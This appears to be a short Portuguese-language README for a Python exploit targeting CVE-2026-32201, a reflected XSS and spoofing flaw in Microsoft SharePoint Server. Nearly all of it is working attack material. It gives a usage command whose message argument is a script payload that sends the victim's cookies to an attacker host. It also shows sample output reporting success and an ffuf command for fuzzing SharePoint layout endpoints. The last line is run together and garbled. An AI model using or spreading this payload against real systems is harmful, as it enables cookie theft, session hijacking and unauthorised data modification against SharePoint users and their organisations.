
Exploit em Python para CVE-2026-32201, um XSS refletido no Microsoft SharePoint Server, que permite falsificação não autenticada e modificação de dados por meio de solicitações HTTP elaboradas.
Exploit em Python para CVE-2026-32201 - validação de entrada inadequada no Microsoft SharePoint Server, permitindo spoofing de rede não autenticado (C:L/I:L).
python3 exploit.py https://sharepoint.target.com \
--recipient [email protected] \
--sender "[email protected]" \
--message "<script>fetch('http://attacker.com/?c='+document.cookie)</script>" \
--endpoint /_layouts/15/notify.aspx
Exemplo de saída:
[+] SharePoint detectado.
[*] Enviando solicitação falsificada para https://target.com/_layouts/15/notify.aspx
[+] Status: 200
[+] Sucesso potencial: Verifique os logs/e-mails do alvo para conteúdo falsificado.
ffuf -u https://target.com/FUZZ -w sharepoint-layouts.txt--message para roubo de cookies